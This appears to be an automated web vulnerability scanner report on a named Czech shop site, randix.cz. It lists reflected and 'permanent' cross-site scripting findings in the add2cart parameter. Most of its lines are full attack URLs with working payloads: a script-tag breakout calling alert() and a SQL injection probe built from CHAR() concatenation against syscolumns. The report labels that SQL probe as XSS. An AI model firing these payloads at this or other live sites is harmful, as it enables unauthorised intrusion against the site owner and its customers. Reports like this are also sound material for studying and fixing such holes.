randix.cz

1. XSS (Cross-site Scripting)
2.  
3. Severity: Important
4. Confirmation: Confirmed
5. Vulnerable URL : http://www.randix.cz/index.php?shopping_cart=yes&add2cart=10'"--></style></script><script>alert(0x00014B)</script>
6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
7. Parameter Name: add2cart
8. Parameter Type: Querystring
9. Attack Pattern: 10'"--></style></script><script>alert(0x00014B)</script>
10.  
11. ||| Permanent XSS (Cross-site Scripting)
12.  
13. Severity: Important
14. Confirmation: Confirmed
15. Vulnerable URL: http://www.randix.cz/index.php?shopping_cart=yes&add2cart='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
16. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
17. Injection URL: http://www.randix.cz/index.php?shopping_cart=yes&add2cart=10%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00014B)%3C%2Fscript%3E
18. Parameter Name: add2cart
19. Parameter Type: Querystring
20. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'